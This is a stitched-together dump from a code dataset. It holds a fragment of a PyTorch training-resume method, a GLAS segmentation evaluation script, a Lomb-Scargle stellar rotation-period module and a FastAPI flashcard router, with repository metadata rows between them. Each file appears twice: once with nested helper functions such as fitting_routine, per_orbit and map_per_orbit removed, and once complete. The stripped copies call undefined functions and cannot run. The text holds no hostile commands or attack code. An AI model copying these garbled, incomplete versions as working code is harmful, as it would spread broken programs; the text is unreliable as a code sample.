def resume_training(self, optimizers, schedulers):
""" resume the optimizers and schedulers for training, only work when phase is test or resume training enable """
if self.phase!='train' or self. opt['path']['resume_state'] is None:
return
assert isinstance(optimizers, list) and isinstance(schedulers, list), 'optimizers and schedulers must be a list.'
state_path = "{}.state".format(self. opt['path']['resume_state'])
self.logger.info('Loading training state for [{:s}] ...'.format(state_path))
resume_state = torch.load(state_path, map_location = lambda storage, loc: self.set_device(storage))
resume_optimizers = resume_state['optimizers']
resume_schedulers = resume_state['schedulers']
assert len(resume_optimizers) == len(optimizers), 'Wrong lengths of optimizers {} != {}'.format(len(resume_optimizers), len(optimizers))
assert len(resume_schedulers) == len(schedulers), 'Wrong lengths of schedulers {} != {}'.format(len(resume_schedulers), len(schedulers))
for i, o in enumerate(resume_optimizers):
optimizers[i].load_state_dict(o)
for i, s in enumerate(resume_schedulers):
schedulers[i].load_state_dict(s)
self.epoch = resume_state['epoch']
self.iter = resume_state['iter']
def load_everything(self):
pass
@abstractmethod
def save_everything(self):
raise NotImplementedError('You must specify how to save your networks, optimizers and schedulers.')
| 2,606 | 4,438 | 23 |
a9b8a1cbfc37583a3c3b3265e5a00f579fd39128 | 3,300 | py | Python | scripts/evaluate_glas.py | mRcfps/wessup | b27052fc969ac60b443d340d7d10b28605b790a0 | [
"MIT"
] | 8 | 2020-03-01T05:56:49.000Z | 2022-02-12T14:38:42.000Z | scripts/evaluate_glas.py | mRcfps/wessup | b27052fc969ac60b443d340d7d10b28605b790a0 | [
"MIT"
] | null | null | null | scripts/evaluate_glas.py | mRcfps/wessup | b27052fc969ac60b443d340d7d10b28605b790a0 | [
"MIT"
] | 5 | 2020-02-29T01:49:33.000Z | 2022-02-03T20:20:32.000Z | import argparse
import os
from pathlib import Path
import sys
sys.path.append(str(Path(__file__).parent.parent))
import pandas as pd
from skimage.io import imread, imsave
from joblib import Parallel, delayed
from utils.metrics import *
parser = argparse.ArgumentParser()
parser.add_argument('pred_root')
args = parser.parse_args()
glas_root = Path('~/data/GLAS_all').expanduser()
pred_root = Path(args.pred_root).expanduser()
new_pred_root = pred_root.parent / (pred_root.name + '-new')
if not new_pred_root.exists():
new_pred_root.mkdir()
(new_pred_root / 'testA').mkdir()
(new_pred_root / 'testB').mkdir()
executor = Parallel(n_jobs=os.cpu_count())
print('Test A')
print('\nReading predictions and gts ...')
pred_paths = sorted((pred_root / 'testA').glob('*.bmp'))
predictions = executor(delayed(postprocess)(imread(str(pred_path)) / 255) for pred_path in pred_paths)
gts = executor(delayed(imread)(gt_path) for gt_path in sorted((glas_root / 'testA' / 'masks').glob('*.bmp')))
print('Saving new predictions ...')
for pred, pred_path in zip(predictions, pred_paths):
imsave(new_pred_root / 'testA' / pred_path.name, (pred * 255).astype('uint8'))
metrics = compute_metrics(predictions, gts, pred_paths)
metrics.to_csv(pred_root / 'testA.csv')
print('\nTest B')
print('\nReading predictions and gts ...')
pred_paths = sorted((pred_root / 'testB').glob('*.bmp'))
predictions = executor(delayed(postprocess)(imread(str(pred_path)) / 255) for pred_path in pred_paths)
gts = executor(delayed(imread)(gt_path) for gt_path in sorted((glas_root / 'testB' / 'masks').glob('*.bmp')))
print('Saving new predictions ...')
for pred, pred_path in zip(predictions, pred_paths):
imsave(new_pred_root / 'testB' / pred_path.name, (pred * 255).astype('uint8'))
metrics = compute_metrics(predictions, gts, pred_paths)
metrics.to_csv(pred_root / 'testB.csv')
| 33.333333 | 109 | 0.706364 | import argparse
import os
from pathlib import Path
import sys
sys.path.append(str(Path(__file__).parent.parent))
import pandas as pd
from skimage.io import imread, imsave
from joblib import Parallel, delayed
from utils.metrics import *
parser = argparse.ArgumentParser()
parser.add_argument('pred_root')
args = parser.parse_args()
glas_root = Path('~/data/GLAS_all').expanduser()
pred_root = Path(args.pred_root).expanduser()
new_pred_root = pred_root.parent / (pred_root.name + '-new')
if not new_pred_root.exists():
new_pred_root.mkdir()
(new_pred_root / 'testA').mkdir()
(new_pred_root / 'testB').mkdir()
executor = Parallel(n_jobs=os.cpu_count())
def postprocess(pred):
regions = label(pred)
for region_idx in range(regions.max() + 1):
region_mask = regions == region_idx
if region_mask.sum() < 2000:
pred[region_mask] = 0
revert_regions = label(1 - pred)
for region_idx in range(revert_regions.max() + 1):
region_mask = revert_regions == region_idx
if region_mask.sum() < 2000:
pred[region_mask] = 1
return pred
def compute_metrics(predictions, gts, pred_paths):
iterable = list(zip(predictions, gts))
accuracies = executor(delayed(accuracy)(pred, gt) for pred, gt in iterable)
print('Accuracy:', np.mean(accuracies))
dices = executor(delayed(dice)(pred, gt) for pred, gt in iterable)
print('Dice:', np.mean(dices))
detection_f1s = executor(delayed(detection_f1)(pred, gt) for pred, gt in iterable)
print('Detection F1:', np.mean(detection_f1s))
object_dices = executor(delayed(object_dice)(pred, gt) for pred, gt in iterable)
print('Object Dice:', np.mean(object_dices))
object_hausdorffs = executor(delayed(object_hausdorff)(pred, gt) for pred, gt in iterable)
print('Object Hausdorff:', np.mean(object_hausdorffs))
df = pd.DataFrame()
df['detection_f1'] = detection_f1s
df['object_dice'] = object_dices
df['object_hausdorff'] = object_hausdorffs
df.index = [pred_path.name for pred_path in pred_paths]
return df
print('Test A')
print('\nReading predictions and gts ...')
pred_paths = sorted((pred_root / 'testA').glob('*.bmp'))
predictions = executor(delayed(postprocess)(imread(str(pred_path)) / 255) for pred_path in pred_paths)
gts = executor(delayed(imread)(gt_path) for gt_path in sorted((glas_root / 'testA' / 'masks').glob('*.bmp')))
print('Saving new predictions ...')
for pred, pred_path in zip(predictions, pred_paths):
imsave(new_pred_root / 'testA' / pred_path.name, (pred * 255).astype('uint8'))
metrics = compute_metrics(predictions, gts, pred_paths)
metrics.to_csv(pred_root / 'testA.csv')
print('\nTest B')
print('\nReading predictions and gts ...')
pred_paths = sorted((pred_root / 'testB').glob('*.bmp'))
predictions = executor(delayed(postprocess)(imread(str(pred_path)) / 255) for pred_path in pred_paths)
gts = executor(delayed(imread)(gt_path) for gt_path in sorted((glas_root / 'testB' / 'masks').glob('*.bmp')))
print('Saving new predictions ...')
for pred, pred_path in zip(predictions, pred_paths):
imsave(new_pred_root / 'testB' / pred_path.name, (pred * 255).astype('uint8'))
metrics = compute_metrics(predictions, gts, pred_paths)
metrics.to_csv(pred_root / 'testB.csv')
| 1,378 | 0 | 46 |
7c8578fa5f45ed4663d04f117ce01c5ce38b800d | 16,745 | py | Python | stella/rotations.py | afeinstein20/sally | f9ffd78d1c7279012e870f3657812595f18eee74 | [
"MIT"
] | 22 | 2019-06-27T19:43:48.000Z | 2022-03-24T21:32:20.000Z | stella/rotations.py | afeinstein20/sally | f9ffd78d1c7279012e870f3657812595f18eee74 | [
"MIT"
] | 16 | 2020-05-21T22:26:51.000Z | 2022-03-21T13:23:37.000Z | stella/rotations.py | afeinstein20/sally | f9ffd78d1c7279012e870f3657812595f18eee74 | [
"MIT"
] | 11 | 2019-07-19T16:41:15.000Z | 2022-03-11T21:49:04.000Z | import numpy as np
from tqdm import tqdm
import statistics as stats
from astropy import units as u
from scipy.signal import medfilt
from scipy.optimize import curve_fit
from astropy.table import Table, Column
from astropy.timeseries import LombScargle
__all__ = ['MeasureProt']
class MeasureProt(object):
"""
Used for measuring rotation periods.
"""
def __init__(self, IDs, time, flux, flux_err):
"""
Takes in light curve identifiers, time, flux,
and flux errors.
"""
self.IDs = IDs
self.time = time
self.flux = flux
self.flux_err = flux_err
def gauss_curve(self, x, std, scale, mu):
""" Fits a Gaussian to the peak of the LS
periodogram.
Parameters
----------
x : np.array
std : float
Standard deviation of gaussian.
scale : float
Scaling for gaussian.
mu : float
Mean to fit around.
Returns
-------
Gaussian curve.
"""
term1 = 1.0 / (std * np.sqrt(2 * np.pi) )
term2 = np.exp(-0.5 * ((x-mu)/std)**2)
return term1 * term2 * scale
def chiSquare(self, var, mu, x, y, yerr):
""" Calculates chi-square for fitting a Gaussian
to the peak of the LS periodogram.
Parameters
----------
var : list
Variables to fit (std and scale for Gaussian curve).
mu : float
Mean to fit around.
x : np.array
y : np.array
yerr : np.array
Returns
-------
chi-square value.
"""
m = self.gauss(x, var[0], var[1], mu)
return np.sum( (y-m)**2 / yerr**2 )
def fit_LS_peak(self, period, power, arg):
""" Fits the LS periodogram at the peak power.
Parameters
----------
period : np.array
Array of periods from Lomb Scargle routine.
power : np.array
Array of powers from the Lomb Scargle routine.
arg : int
Argmax of the power in the periodogram.
Returns
-------
popt : np.array
Array of best fit values for Gaussian fit.
"""
if arg-40 < 0:
start = 0
else:
start = arg-40
if arg+40 > len(period):
end = len(period)-1
else:
end = arg+40
m = np.arange(start, end, 1, dtype=int)
if arg-20 < 0:
start = 0
else:
start = arg-20
if arg + 20 > len(period):
end = len(period)-1
else:
end = arg+20
subm = np.arange(start, end, 1, dtype=int)
try:
popt = fitting_routine()
except RuntimeError:
popt = np.full(3, np.nan)
# TRIES TO READJUST FITTING WINDOW IF RANGE IS LARGER THAN PERIOD ARRAY
except IndexError:
if np.min(m) <= 0:
m = np.arange(0,arg+40,1,dtype=int)
subm = np.arange(0,arg+20,1, dtype=int)
elif np.max(m) > len(period):
diff = np.max(m) - len(period)
m = np.arange(arg-40-diff, len(period)-diff, 1, dtype=int)
subm = np.arange(arg-20-diff, len(period)-diff-20, 1, dtype=int)
popt = fitting_routine()
return popt
def run_LS(self, minf=1/12.5, maxf=1/0.1, spp=50):
""" Runs LS fit for each light curve.
Parameters
----------
minf : float, optional
The minimum frequency to search in the LS routine. Default = 1/20.
maxf : float, optional
The maximum frequency to search in the LS routine. Default = 1/0.1.
spp : int, optional
The number of samples per peak. Default = 50.
Attributes
----------
LS_results : astropy.table.Table
"""
tab = Table()
periods = np.zeros(len(self.IDs))
stds = np.zeros(len(self.IDs))
peak_power = np.zeros(len(self.IDs))
periods2 = np.zeros(len(self.IDs))
peak_power2 = np.zeros(len(self.IDs))
orbit_flag = np.zeros(len(self.IDs))
orbit_flag1 = np.zeros(len(self.IDs))
orbit_flag2 = np.zeros(len(self.IDs))
for i in tqdm(range(len(self.flux)), desc="Finding most likely periods"):
time, flux, flux_err = self.time[i], self.flux[i], self.flux_err[i]
# SPLITS BY ORBIT
diff = np.diff(time)
brk = np.where(diff >= np.nanmedian(diff)+14*np.nanstd(diff))[0]
if len(brk) > 1:
brk_diff = brk - (len(time)/2)
try:
brk_diff = np.where(brk_diff<0)[0][-1]
except IndexError:
brk_diff = np.argmin(brk_diff)
brk = np.array([brk[brk_diff]], dtype=int)
# DEFINITELY TRIMS OUT EARTHSHINE MOFO
t1, f1 = time[:brk[0]], flux[:brk[0]]#[300:-500], flux[:brk[0]]#[300:-500]
t2, f2 = time[brk[0]:], flux[brk[0]:]#[800:-200], flux[brk[0]:]#[800:-200]
o1_params = per_orbit(t1, f1)
o2_params = per_orbit(t2, f2)
both = np.array([o1_params[0], o2_params[0]])
avg_period = np.nanmedian(both)
flag1 = self.assign_flag(o1_params[0], o1_params[2], o1_params[-1],
avg_period, o1_params[-2], t1[-1]-t1[0])
flag2 = self.assign_flag(o2_params[0], o2_params[2], o2_params[-1],
avg_period, o2_params[-2], t2[-1]-t2[0])
if np.abs(o1_params[1]-avg_period) < 0.5 and np.abs(o2_params[1]-avg_period)<0.5:
flag1 = flag2 = 0.0
if flag1 != 0 and flag2 != 0:
orbit_flag[i] = 1.0
else:
orbit_flag[i] = 0.0
periods[i] = np.nanmedian([o1_params[0], o2_params[0]])
orbit_flag1[i] = flag1
orbit_flag2[i] = flag2
stds[i] = o1_params[-1]
peak_power[i] = o1_params[2]
periods2[i] = o2_params[0]
peak_power2[i] = o1_params[-2]
tab.add_column(Column(self.IDs, 'Target_ID'))
tab.add_column(Column(periods, name='period_days'))
tab.add_column(Column(periods2, name='secondary_period_days'))
tab.add_column(Column(stds, name='gauss_width'))
tab.add_column(Column(peak_power, name='max_power'))
tab.add_column(Column(peak_power2, name='secondary_max_power'))
tab.add_column(Column(orbit_flag, name='orbit_flag'))
tab.add_column(Column(orbit_flag1, name='oflag1'))
tab.add_column(Column(orbit_flag2, name='oflag2'))
tab = self.averaged_per_sector(tab)
self.LS_results = tab
def assign_flag(self, period, power, width, avg, secpow,
maxperiod, orbit_flag=0):
""" Assigns a flag in the table for which periods are reliable.
"""
flag = 100
if period > maxperiod:
flag = 4
if (period < maxperiod) and (power > 0.005):
flag = 3
if (period < maxperiod) and (width <= period*0.6) and (power > 0.005):
flag = 2
if ( (period < maxperiod) and (width <= period*0.6) and
(secpow < 0.96*power) and (power > 0.005)):
flag = 1
if ( (period < maxperiod) and (width <= period*0.6) and
(secpow < 0.96*power) and (np.abs(period-avg)<1.0) and (power > 0.005)):
flag = 0
if flag == 100:
flag = 5
return flag
def averaged_per_sector(self, tab):
""" Looks at targets observed in different sectors and determines
which period measured is likely the best period. Adds a column
to MeasureRotations.LS_results of 'true_period_days' for the
results.
Returns
-------
astropy.table.Table
"""
averaged_periods = np.zeros(len(tab))
flagging = np.zeros(len(tab), dtype=int)
limit = 0.3
for tic in np.unique(self.IDs):
inds = np.where(tab['Target_ID']==tic)[0]
primary = tab['period_days'].data[inds]
secondary = tab['secondary_period_days'].data[inds]
all_periods = np.append(primary, secondary)
# ind_flags = np.append(tab['oflag1'].data[inds],
# tab['oflag2'].data[inds])
avg = np.array([])
tflags = np.array([])
if len(inds) > 1:
try:
mode = stats.mode(np.round(all_periods,2))
if mode > 11.5:
avg = np.full(np.nanmean(primary), len(inds))
tflags = np.full(2, len(inds))
else:
for i in range(len(inds)):
if np.abs(primary[i]-mode) < limit:
avg = np.append(avg, primary[i])
tflags = np.append(tflags,0)
elif np.abs(secondary[i]-mode) < limit:
avg = np.append(avg, secondary[i])
tflags = np.append(tflags,1)
elif np.abs(primary[i]/2.-mode) < limit:
avg = np.append(avg, primary[i]/2.)
tflags = np.append(tflags,0)
elif np.abs(secondary[i]/2.-mode) < limit:
avg = np.append(avg, secondary[i]/2.)
tflags = np.append(tflags,1)
elif np.abs(primary[i]*2.-mode) < limit:
avg = np.append(avg, primary[i]*2.)
tflags = np.append(tflags,0)
elif np.abs(secondary[i]*2.-mode) < limit:
avg = np.append(avg, secondary[i]*2.)
tflags = np.append(tflags,1)
else:
tflags = np.append(tflags, 2)
except:
for i in range(len(inds)):
if tab['oflag1'].data[inds[i]]==0 and tab['oflag2'].data[inds[i]]==0:
avg = np.append(avg, tab['period_days'].data[inds[i]])
tflags = np.append(tflags, 0)
else:
tflags = np.append(tflags,2)
else:
avg = np.nanmean(primary)
if tab['oflag1'].data[inds] == 0 and tab['oflag2'].data[inds]==0:
tflags = 0
else:
tflags = 2
averaged_periods[inds] = np.nanmean(avg)
flagging[inds] = tflags
tab.add_column(Column(flagging, 'Flags'))
tab.add_column(Column(averaged_periods, 'avg_period_days'))
return tab
def phase_lightcurve(self, table=None, trough=-0.5, peak=0.5, kernel_size=101):
"""
Finds and creates a phase light curve that traces the spots.
Uses only complete rotations and extrapolates outwards until the
entire light curve is covered.
Parameters
----------
table : astropy.table.Table, optional
Used for getting the periods of each light curve. Allows users
to use already created tables. Default = None. Will search for
stella.FindTheSpots.LS_results.
trough : float, optional
Sets the phase value at the minimum. Default = -0.5.
peak : float, optional
Sets the phase value t the maximum. Default = 0.5.
kernel_size : odd float, optional
Sets kernel size for median filter smoothing. Default = 15.
Attributes
----------
phases : np.ndarray
"""
if table is None:
table = self.LS_results
PHASES = np.copy(self.flux)
for i in tqdm(range(len(table)), desc="Mapping phases"):
flag = table['Flags'].data[i]
if flag == 0 or flag == 1:
period = table['avg_period_days'].data[i] * u.day
cadences = int(np.round((period.to(u.min)/2).value))
all_time = self.time[i]
all_flux = self.flux[i]
diff = np.diff(all_time)
gaptime = np.where(diff>=np.nanmedian(diff)+12*np.nanstd(diff))[0][0]
t1, f1 = all_time[:gaptime+1], all_flux[:gaptime+1]
t2, f2 = all_time[gaptime+1:], all_flux[gaptime+1:]
o1map = map_per_orbit(t1, f1, kernel_size=101, cadences=cadences)
o2map = map_per_orbit(t2, f2, kernel_size=101, cadences=cadences)
phase = np.append(o1map, o2map)
else:
phase = np.zeros(len(self.flux[i]))
PHASES[i] = phase
self.phases = PHASES
| 35.476695 | 97 | 0.478232 | import numpy as np
from tqdm import tqdm
import statistics as stats
from astropy import units as u
from scipy.signal import medfilt
from scipy.optimize import curve_fit
from astropy.table import Table, Column
from astropy.timeseries import LombScargle
__all__ = ['MeasureProt']
class MeasureProt(object):
"""
Used for measuring rotation periods.
"""
def __init__(self, IDs, time, flux, flux_err):
"""
Takes in light curve identifiers, time, flux,
and flux errors.
"""
self.IDs = IDs
self.time = time
self.flux = flux
self.flux_err = flux_err
def gauss_curve(self, x, std, scale, mu):
""" Fits a Gaussian to the peak of the LS
periodogram.
Parameters
----------
x : np.array
std : float
Standard deviation of gaussian.
scale : float
Scaling for gaussian.
mu : float
Mean to fit around.
Returns
-------
Gaussian curve.
"""
term1 = 1.0 / (std * np.sqrt(2 * np.pi) )
term2 = np.exp(-0.5 * ((x-mu)/std)**2)
return term1 * term2 * scale
def chiSquare(self, var, mu, x, y, yerr):
""" Calculates chi-square for fitting a Gaussian
to the peak of the LS periodogram.
Parameters
----------
var : list
Variables to fit (std and scale for Gaussian curve).
mu : float
Mean to fit around.
x : np.array
y : np.array
yerr : np.array
Returns
-------
chi-square value.
"""
m = self.gauss(x, var[0], var[1], mu)
return np.sum( (y-m)**2 / yerr**2 )
def fit_LS_peak(self, period, power, arg):
""" Fits the LS periodogram at the peak power.
Parameters
----------
period : np.array
Array of periods from Lomb Scargle routine.
power : np.array
Array of powers from the Lomb Scargle routine.
arg : int
Argmax of the power in the periodogram.
Returns
-------
popt : np.array
Array of best fit values for Gaussian fit.
"""
def fitting_routine():
popt, pcov = curve_fit(self.gauss_curve, period[m], power[m],
p0 = [(np.nanmax(period[subm]) - np.nanmin(period[subm]))/2.0,
0.02,
period[arg]],
maxfev = 5000)
return popt
if arg-40 < 0:
start = 0
else:
start = arg-40
if arg+40 > len(period):
end = len(period)-1
else:
end = arg+40
m = np.arange(start, end, 1, dtype=int)
if arg-20 < 0:
start = 0
else:
start = arg-20
if arg + 20 > len(period):
end = len(period)-1
else:
end = arg+20
subm = np.arange(start, end, 1, dtype=int)
try:
popt = fitting_routine()
except RuntimeError:
popt = np.full(3, np.nan)
# TRIES TO READJUST FITTING WINDOW IF RANGE IS LARGER THAN PERIOD ARRAY
except IndexError:
if np.min(m) <= 0:
m = np.arange(0,arg+40,1,dtype=int)
subm = np.arange(0,arg+20,1, dtype=int)
elif np.max(m) > len(period):
diff = np.max(m) - len(period)
m = np.arange(arg-40-diff, len(period)-diff, 1, dtype=int)
subm = np.arange(arg-20-diff, len(period)-diff-20, 1, dtype=int)
popt = fitting_routine()
return popt
def run_LS(self, minf=1/12.5, maxf=1/0.1, spp=50):
""" Runs LS fit for each light curve.
Parameters
----------
minf : float, optional
The minimum frequency to search in the LS routine. Default = 1/20.
maxf : float, optional
The maximum frequency to search in the LS routine. Default = 1/0.1.
spp : int, optional
The number of samples per peak. Default = 50.
Attributes
----------
LS_results : astropy.table.Table
"""
def per_orbit(t, f):
nonlocal maxf, spp
minf = 1/(t[-1]-t[0])
if minf > 1/12.0:
minf = 1/12.0
freq, power = LombScargle(t, f).autopower(minimum_frequency=minf,
maximum_frequency=maxf,
samples_per_peak=spp)
arg = np.argmax(power)
per = 1.0/freq
popt = self.fit_LS_peak(per, power, arg)
## SEARCHES & MASKS RESONANCES OF THE BEST-FIT PERIOD
perlist = per[arg] * np.array([0.5, 1.0, 2.0, 4.0, 8.0])
remove_res = np.zeros(len(per))
maskreg = int(spp/1.5)
for p in perlist:
where = np.where( (per <= p))[0]
if len(where) > 0:
ind = int(where[0])
if ind-maskreg > 0 and ind<len(per)-maskreg:
remove_res[int(ind-maskreg):int(ind+maskreg)] = 1
elif ind < maskreg:
remove_res[0:int(maskreg)] = 1
elif ind > len(per)-maskreg:
remove_res[int(len(per)-maskreg):len(per)] = 1
if perlist[1] == 1/minf:
remove_res[0:int(spp/2)] = 1
rr = remove_res == 0
arg1 = np.argmax(power[rr])
## REDOS PERIOD ROUTINE FOR SECOND HIGHEST PEAK
if arg1 == len(per[rr]):
arg1 = int(arg1-3)
popt2 = self.fit_LS_peak(per[rr], power[rr], arg1)
maxpower = power[arg]
secpower = power[rr][arg1]
bestperiod = per[arg]
secbperiod = per[rr][arg1]
bestwidth = popt[0]
return bestperiod, secbperiod, maxpower, secpower, bestwidth
tab = Table()
periods = np.zeros(len(self.IDs))
stds = np.zeros(len(self.IDs))
peak_power = np.zeros(len(self.IDs))
periods2 = np.zeros(len(self.IDs))
peak_power2 = np.zeros(len(self.IDs))
orbit_flag = np.zeros(len(self.IDs))
orbit_flag1 = np.zeros(len(self.IDs))
orbit_flag2 = np.zeros(len(self.IDs))
for i in tqdm(range(len(self.flux)), desc="Finding most likely periods"):
time, flux, flux_err = self.time[i], self.flux[i], self.flux_err[i]
# SPLITS BY ORBIT
diff = np.diff(time)
brk = np.where(diff >= np.nanmedian(diff)+14*np.nanstd(diff))[0]
if len(brk) > 1:
brk_diff = brk - (len(time)/2)
try:
brk_diff = np.where(brk_diff<0)[0][-1]
except IndexError:
brk_diff = np.argmin(brk_diff)
brk = np.array([brk[brk_diff]], dtype=int)
# DEFINITELY TRIMS OUT EARTHSHINE MOFO
t1, f1 = time[:brk[0]], flux[:brk[0]]#[300:-500], flux[:brk[0]]#[300:-500]
t2, f2 = time[brk[0]:], flux[brk[0]:]#[800:-200], flux[brk[0]:]#[800:-200]
o1_params = per_orbit(t1, f1)
o2_params = per_orbit(t2, f2)
both = np.array([o1_params[0], o2_params[0]])
avg_period = np.nanmedian(both)
flag1 = self.assign_flag(o1_params[0], o1_params[2], o1_params[-1],
avg_period, o1_params[-2], t1[-1]-t1[0])
flag2 = self.assign_flag(o2_params[0], o2_params[2], o2_params[-1],
avg_period, o2_params[-2], t2[-1]-t2[0])
if np.abs(o1_params[1]-avg_period) < 0.5 and np.abs(o2_params[1]-avg_period)<0.5:
flag1 = flag2 = 0.0
if flag1 != 0 and flag2 != 0:
orbit_flag[i] = 1.0
else:
orbit_flag[i] = 0.0
periods[i] = np.nanmedian([o1_params[0], o2_params[0]])
orbit_flag1[i] = flag1
orbit_flag2[i] = flag2
stds[i] = o1_params[-1]
peak_power[i] = o1_params[2]
periods2[i] = o2_params[0]
peak_power2[i] = o1_params[-2]
tab.add_column(Column(self.IDs, 'Target_ID'))
tab.add_column(Column(periods, name='period_days'))
tab.add_column(Column(periods2, name='secondary_period_days'))
tab.add_column(Column(stds, name='gauss_width'))
tab.add_column(Column(peak_power, name='max_power'))
tab.add_column(Column(peak_power2, name='secondary_max_power'))
tab.add_column(Column(orbit_flag, name='orbit_flag'))
tab.add_column(Column(orbit_flag1, name='oflag1'))
tab.add_column(Column(orbit_flag2, name='oflag2'))
tab = self.averaged_per_sector(tab)
self.LS_results = tab
def assign_flag(self, period, power, width, avg, secpow,
maxperiod, orbit_flag=0):
""" Assigns a flag in the table for which periods are reliable.
"""
flag = 100
if period > maxperiod:
flag = 4
if (period < maxperiod) and (power > 0.005):
flag = 3
if (period < maxperiod) and (width <= period*0.6) and (power > 0.005):
flag = 2
if ( (period < maxperiod) and (width <= period*0.6) and
(secpow < 0.96*power) and (power > 0.005)):
flag = 1
if ( (period < maxperiod) and (width <= period*0.6) and
(secpow < 0.96*power) and (np.abs(period-avg)<1.0) and (power > 0.005)):
flag = 0
if flag == 100:
flag = 5
return flag
def averaged_per_sector(self, tab):
""" Looks at targets observed in different sectors and determines
which period measured is likely the best period. Adds a column
to MeasureRotations.LS_results of 'true_period_days' for the
results.
Returns
-------
astropy.table.Table
"""
def flag_em(val, mode, lim):
if np.abs(val-mode) < lim:
return 0
else:
return 1
averaged_periods = np.zeros(len(tab))
flagging = np.zeros(len(tab), dtype=int)
limit = 0.3
for tic in np.unique(self.IDs):
inds = np.where(tab['Target_ID']==tic)[0]
primary = tab['period_days'].data[inds]
secondary = tab['secondary_period_days'].data[inds]
all_periods = np.append(primary, secondary)
# ind_flags = np.append(tab['oflag1'].data[inds],
# tab['oflag2'].data[inds])
avg = np.array([])
tflags = np.array([])
if len(inds) > 1:
try:
mode = stats.mode(np.round(all_periods,2))
if mode > 11.5:
avg = np.full(np.nanmean(primary), len(inds))
tflags = np.full(2, len(inds))
else:
for i in range(len(inds)):
if np.abs(primary[i]-mode) < limit:
avg = np.append(avg, primary[i])
tflags = np.append(tflags,0)
elif np.abs(secondary[i]-mode) < limit:
avg = np.append(avg, secondary[i])
tflags = np.append(tflags,1)
elif np.abs(primary[i]/2.-mode) < limit:
avg = np.append(avg, primary[i]/2.)
tflags = np.append(tflags,0)
elif np.abs(secondary[i]/2.-mode) < limit:
avg = np.append(avg, secondary[i]/2.)
tflags = np.append(tflags,1)
elif np.abs(primary[i]*2.-mode) < limit:
avg = np.append(avg, primary[i]*2.)
tflags = np.append(tflags,0)
elif np.abs(secondary[i]*2.-mode) < limit:
avg = np.append(avg, secondary[i]*2.)
tflags = np.append(tflags,1)
else:
tflags = np.append(tflags, 2)
except:
for i in range(len(inds)):
if tab['oflag1'].data[inds[i]]==0 and tab['oflag2'].data[inds[i]]==0:
avg = np.append(avg, tab['period_days'].data[inds[i]])
tflags = np.append(tflags, 0)
else:
tflags = np.append(tflags,2)
else:
avg = np.nanmean(primary)
if tab['oflag1'].data[inds] == 0 and tab['oflag2'].data[inds]==0:
tflags = 0
else:
tflags = 2
averaged_periods[inds] = np.nanmean(avg)
flagging[inds] = tflags
tab.add_column(Column(flagging, 'Flags'))
tab.add_column(Column(averaged_periods, 'avg_period_days'))
return tab
def phase_lightcurve(self, table=None, trough=-0.5, peak=0.5, kernel_size=101):
"""
Finds and creates a phase light curve that traces the spots.
Uses only complete rotations and extrapolates outwards until the
entire light curve is covered.
Parameters
----------
table : astropy.table.Table, optional
Used for getting the periods of each light curve. Allows users
to use already created tables. Default = None. Will search for
stella.FindTheSpots.LS_results.
trough : float, optional
Sets the phase value at the minimum. Default = -0.5.
peak : float, optional
Sets the phase value t the maximum. Default = 0.5.
kernel_size : odd float, optional
Sets kernel size for median filter smoothing. Default = 15.
Attributes
----------
phases : np.ndarray
"""
def map_per_orbit(time, flux, kernel_size, cadences):
mf = medfilt(flux, kernel_size=kernel_size)
argmin = np.argmin(mf[:cadences])
mapping = np.linspace(0.5,-0.5, cadences)
phase = np.ones(len(flux))
full = int(np.floor(len(time)/cadences))
phase[0:argmin] = mapping[len(mapping)-argmin:]
points = np.arange(argmin, cadences*(full+1)+argmin, cadences, dtype=int)
for i in range(len(points)-1):
try:
phase[points[i]:points[i+1]] = mapping
except:
pass
remainder = len(np.where(phase==1.0)[0])
phase[len(phase)-remainder:] = mapping[0:remainder]
return phase
if table is None:
table = self.LS_results
PHASES = np.copy(self.flux)
for i in tqdm(range(len(table)), desc="Mapping phases"):
flag = table['Flags'].data[i]
if flag == 0 or flag == 1:
period = table['avg_period_days'].data[i] * u.day
cadences = int(np.round((period.to(u.min)/2).value))
all_time = self.time[i]
all_flux = self.flux[i]
diff = np.diff(all_time)
gaptime = np.where(diff>=np.nanmedian(diff)+12*np.nanstd(diff))[0][0]
t1, f1 = all_time[:gaptime+1], all_flux[:gaptime+1]
t2, f2 = all_time[gaptime+1:], all_flux[gaptime+1:]
o1map = map_per_orbit(t1, f1, kernel_size=101, cadences=cadences)
o2map = map_per_orbit(t2, f2, kernel_size=101, cadences=cadences)
phase = np.append(o1map, o2map)
else:
phase = np.zeros(len(self.flux[i]))
PHASES[i] = phase
self.phases = PHASES
| 3,082 | 0 | 120 |
70dbecde69f5350b76c86a87b6e8a98005d66126 | 4,777 | py | Python | api/routes/flashcard.py | axxander/FlashcardAPI | b7221aa567b2c59700813a3cab46d58ca7897086 | [
"MIT"
] | null | null | null | api/routes/flashcard.py | axxander/FlashcardAPI | b7221aa567b2c59700813a3cab46d58ca7897086 | [
"MIT"
] | null | null | null | api/routes/flashcard.py | axxander/FlashcardAPI | b7221aa567b2c59700813a3cab46d58ca7897086 | [
"MIT"
] | null | null | null | from typing import List
from fastapi import APIRouter, Depends, HTTPException, status
from app import schemas, models
from app.services.jwt import get_current_user
router = APIRouter(
prefix="/flashcard",
tags=["flashcard"]
)
# Create new flashcard
@router.post("/", response_model=schemas.Flashcard)
# List all flashcards
@router.get("/", response_model=List[schemas.Flashcard])
# Get flashcards of specific category
@router.get("/{category}", response_model=List[schemas.Flashcard])
# Get flashcard by ID
@router.get("/id/{flashcard_id}", response_model=schemas.Flashcard)
# Update flashcard by ID
@router.put("/id/{flashcard_id}", response_model=schemas.Flashcard)
# Bulk change category name
@router.put("/{category}", response_model=schemas.RenameFlashcardCategory)
# Delete flashcard by ID
@router.delete("/id/{flashcard_id}", response_model=int)
# Delete flashcard by category
@router.delete("/{category}", response_model=int) | 29.487654 | 87 | 0.6973 | from typing import List
from fastapi import APIRouter, Depends, HTTPException, status
from app import schemas, models
from app.services.jwt import get_current_user
router = APIRouter(
prefix="/flashcard",
tags=["flashcard"]
)
# Create new flashcard
@router.post("/", response_model=schemas.Flashcard)
async def create_flashcard(
new_flashcard: schemas.FlashcardCreate,
user: schemas.User = Depends(get_current_user)
) -> schemas.Flashcard:
# Create flashcard in DB with FK of user id
flashcard = await models.Flashcard.create(
**new_flashcard.dict(),
user=await models.User.filter(id=user.id).get()
)
return schemas.Flashcard.from_orm(flashcard)
# List all flashcards
@router.get("/", response_model=List[schemas.Flashcard])
async def get_flashcards(
user: schemas.User = Depends(get_current_user)
) -> List[schemas.Flashcard]:
# Fetch user's flashcards
flashcards = await models.Flashcard.filter(user_id=user.id)
return [
*map(
lambda flashcard: schemas.Flashcard.from_orm(flashcard),
flashcards
)
]
